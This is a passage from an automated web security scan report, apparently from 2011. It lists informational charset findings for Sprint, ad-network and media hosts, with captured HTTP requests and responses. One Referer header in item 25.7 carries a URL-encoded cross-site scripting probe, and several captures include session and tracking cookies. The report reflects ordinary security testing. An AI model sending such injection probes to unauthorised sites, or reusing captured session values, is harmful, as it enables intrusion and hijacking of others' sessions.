P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sun, 04 Sep 2011 01:18:42 GMT
Connection: close
Content-Length: 2076

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Sharing..
...[SNIP]...

24.2. https://sprintlb.ehosts.net/narouter/eQueueCheck.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sprintlb.ehosts.net
Path:	/narouter/eQueueCheck.aspx

Request

GET /narouter/eQueueCheck.aspx HTTP/1.1
Host: sprintlb.ehosts.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:19:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 400

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>CIM Dispatcher</title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
       <meta name=
...[SNIP]...

24.3. https://www.sprint.net/performance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/

Request

Response

24.4. https://www.sprint.net/performance/gen_line_xml.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/gen_line_xml.php

Request

GET /performance/gen_line_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1124; path=/
Date: Sun, 04 Sep 2011 00:47:40 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 301119

<line>
   <start_x>982.22222222222</start_x>
   <start_y>205.31944444444</start_y>
   <end_x>984.10617777778</end_x>
   <end_y>212.28597238889</end_y>
   <ctrl_x>986.6642</ctrl_x>
   <ctrl_y>211.80270841667</ctrl
...[SNIP]...

24.5. https://www.sprint.net/performance/gen_pop_xml.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/performance/gen_pop_xml.php

Request

GET /performance/gen_pop_xml.php HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
Referer: https://www.sprint.net/performance/performance.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ServerID=1125

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 00:47:41 GMT
Server: Apache/2.2.4 (Unix)
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 91549

<pop>
   <market_full>Nashville, TN</market_full>
   <market_short>nsh</market_short>
   <x>984.14638604058</x>
   <y>221.96406860352</y>
   <color>1</color>
   <region>na</region>
   <position>C</position>
   <probe
...[SNIP]...

25. HTML does not specify charset previous next
There are 25 instances of this issue:

http://a1128.g.akamai.net/favicon.ico
http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10
http://ad.doubleclick.net/adj/sacbee_cim/
http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics
http://content.usatoday.com/asp/uas3/uasSignedOut.htm
http://ds.addthis.com/red/psi/sites/content.usatoday.com/p.json
http://graphics.cstv.com/store/.gif
http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
http://premium.mookie1.com/2/nbc.com/ac@Bottom3
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
http://view.atdmt.com/SPT/iview/194719689/direct/01
http://view.atdmt.com/SPT/iview/194719690/direct/01
http://view.atdmt.com/SPT/iview/194719691/direct/01
http://view.atdmt.com/SPT/iview/194719692/direct/01
http://view.atdmt.com/SPT/iview/194719693/direct/01
http://view.atdmt.com/SPT/iview/194719989/direct/01
http://view.atdmt.com/SPT/iview/194719990/direct/01
http://view.atdmt.com/SPT/iview/194719991/direct/01
http://view.atdmt.com/SPT/iview/194719992/direct/01
http://view.atdmt.com/SPT/iview/194719993/direct/01
http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1
http://w55c.net/ct/cms-2-frame.html
https://www.sprint.net/performance/gen_line_xml.php
https://www.sprint.net/performance/gen_pop_xml.php
http://www.wunderground.com/auto/sacbee/CA/Sacramento.html

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

25.1. http://a1128.g.akamai.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a1128.g.akamai.net
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: a1128.g.akamai.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.0 400 Bad Request
Server: AkamaiGHost
Mime-Version: 1.0
Content-Type: text/html
Content-Length: 208
Expires: Sun, 04 Sep 2011 01:22:45 GMT
Date: Sun, 04 Sep 2011 01:22:45 GMT
Connection: close

<HTML><HEAD>
<TITLE>Invalid URL</TITLE>
</HEAD><BODY>
<H1>Invalid URL</H1>
The requested URL "/favicon.ico", is invalid.<p>
Reference #9.8b4a4350.1315099365.9909dac
</BODY>
...[SNIP]...

25.2. http://ad.doubleclick.net/adi/N3093.150834.0497248606521/B5801515.10 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3093.150834.0497248606521/B5801515.10

Request

Response

25.3. http://ad.doubleclick.net/adj/sacbee_cim/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/sacbee_cim/

Request

Response

25.4. http://ad.doubleclick.net/pfadx/mi.sac00/News/State/GovtPolitics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/pfadx/mi.sac00/News/State/GovtPolitics

Request

GET /pfadx/mi.sac00/News/State/GovtPolitics;dcove=d;lvl6=Product:%20Blogs:%20Moveable%20Type:%20Sacramento%20Bee%20--%20The%20State%20Worker;pl=sectfront;!c=meebo;atf=n;pos=1;sz=100x60;tile=1;dcmt=text/html;ord=0123456789? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=229b025847010047||t=1314754416|et=730|cs=002213fd48ab1c4d1bf867f0d1

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1068
DCLK_imp: v7;x;240368085;1-0;0;17382759;100/60;43837061/43854848/1;;~okv=;dcove=d;lvl6=Product: Blogs: Moveable Type: Sacramento Bee -- The State Worker;pl=sectfront;!c=meebo;atf=n;pos=1;sz=100x60;tile=1;dcmt=text/html;~cs=o
Date: Sun, 04 Sep 2011 00:48:38 GMT

MeeboAdPayload = {type: "Partner", ad: {"impression": "http://ad.doubleclick.net/imp;v7;x;240368085;1-0;0;17382759;100/60;43837061/43854848/1;;~okv=;dcove=d;lvl6=Product: Blogs: Moveable Type: Sacrame
...[SNIP]...

25.5. http://content.usatoday.com/asp/uas3/uasSignedOut.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.usatoday.com
Path:	/asp/uas3/uasSignedOut.htm

Request

Response

25.6. http://ds.addthis.com/red/psi/sites/content.usatoday.com/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ds.addthis.com
Path:	/red/psi/sites/content.usatoday.com/p.json

Request

GET /red/psi/sites/content.usatoday.com/p.json?callback=_ate.ad.hpr&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Ftopics&ref=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&cb26m7 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; psc=4; uid=4e5e3f1ae3fd7427; uvc=32|35

Response

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 04 Sep 2011 00:51:44 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 04 Oct 2011 00:51:44 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 04 Sep 2011 00:51:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 00:51:44 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

25.7. http://graphics.cstv.com/store/.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://graphics.cstv.com
Path:	/store/.gif

Request

GET /store/.gif HTTP/1.1
Host: graphics.cstv.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.und.com/sportsb3f73%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E312ccc6a7af/m-footbl/9873956

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cteonnt-Length: 345
Server: lighttpd/1.4.19
Content-Length: 345
Cache-Control: private, max-age=7776000
Date: Sun, 04 Sep 2011 00:56:55 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

25.8. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/4462/5032/7102-2.html

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

25.9. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://premium.mookie1.com
Path:	/2/nbc.com/ac@Bottom3

Request

GET /2/nbc.com/ac@Bottom3 HTTP/1.1
Host: premium.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5iycEADA/r; NSC_o4_qsfnjvn_efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:14 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 230
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var xaval = 'n';
document.write('<iframe src="http://www.nbcudigitaladops.com/hosted/util/setRemoteDomainCookies.html?xa='+xaval+'" width=0 heig
...[SNIP]...

25.10. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://snas.nbcuni.com
Path:	/snas/api/getRemoteDomainCookies

Request

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:35 GMT
Content-Length: 90
Content-Type: text/html

__nbcsnasadops.doSCallback({ "cookie":{"JSESSIONID":"C58B4400F3879E26517C8A2E3ECF06E2"}});

25.11. http://view.atdmt.com/SPT/iview/194719689/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/SPT/iview/194719689/direct/01

Request

GET /SPT/iview/194719689/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 333

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719689/direct;ai.224945378;ct.1/01" target="_top">
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPR
...[SNIP]...

25.12. http://view.atdmt.com/SPT/iview/194719690/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/SPT/iview/194719690/direct/01

Request

GET /SPT/iview/194719690/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 328

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719690/direct;ai.226714311;ct.1/01" target="_top">
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPR
...[SNIP]...

25.13. http://view.atdmt.com/SPT/iview/194719691/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/SPT/iview/194719691/direct/01

Request

GET /SPT/iview/194719691/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 317

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719691/direct;ai.231675849;ct.1/01" target="_top">
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPR
...[SNIP]...

25.14. http://view.atdmt.com/SPT/iview/194719692/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/SPT/iview/194719692/direct/01

Request

GET /SPT/iview/194719692/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 318

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719692/direct;ai.227792771;ct.1/01" target="_top">
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPR
...[SNIP]...

25.15. http://view.atdmt.com/SPT/iview/194719693/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/SPT/iview/194719693/direct/01

Request

GET /SPT/iview/194719693/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 337

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719693/direct;ai.234125290;ct.1/01" target="_top">
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPR
...[SNIP]...

25.16. http://view.atdmt.com/SPT/iview/194719989/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/SPT/iview/194719989/direct/01

Request

GET /SPT/iview/194719989/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 298

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">

<a href="http://clk.atdmt.com/go/194719989/direct;ai.224945383;ct.1/01"> </a>

<img src="HTTP://spe.atdmt.com/ds/YUSPTSPRTSPR/
...[SNIP]...

25.17. http://view.atdmt.com/SPT/iview/194719990/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/SPT/iview/194719990/direct/01

Request

GET /SPT/iview/194719990/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:35 GMT
Connection: close
Content-Length: 285

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719990/direct;ai.226715544;ct.1/01"></a>
<img src="HTTP://ec.atdmt.com/ds/YUSPTSPRTSPR/HERO/0
...[SNIP]...

25.18. http://view.atdmt.com/SPT/iview/194719991/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/SPT/iview/194719991/direct/01

Request

GET /SPT/iview/194719991/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 288

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719991/direct;ai.228559374;ct.1/01"></a>
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPRTSPR/HERO/
...[SNIP]...

25.19. http://view.atdmt.com/SPT/iview/194719992/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/SPT/iview/194719992/direct/01

Request

GET /SPT/iview/194719992/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:36 GMT
Connection: close
Content-Length: 285

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719992/direct;ai.227792773;ct.1/01"></a>
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPRTSPR/HERO/
...[SNIP]...

25.20. http://view.atdmt.com/SPT/iview/194719993/direct/01 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/SPT/iview/194719993/direct/01

Request

GET /SPT/iview/194719993/direct/01?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:35 GMT
Connection: close
Content-Length: 286

<body style="background-color:#FFFFFF" leftmargin="0" topmargin="0">
<a href="http://clk.atdmt.com/go/194719993/direct;ai.234127148;ct.1/01"></a>
<img src="HTTP://spe.atdmt.com/ds/YUSPTSPRTSPR/HERO/
...[SNIP]...

25.21. http://view.atdmt.com/jaction/m0nssc_20HomePageConsumerBase_1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/jaction/m0nssc_20HomePageConsumerBase_1

Request

GET /jaction/m0nssc_20HomePageConsumerBase_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/index_c.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
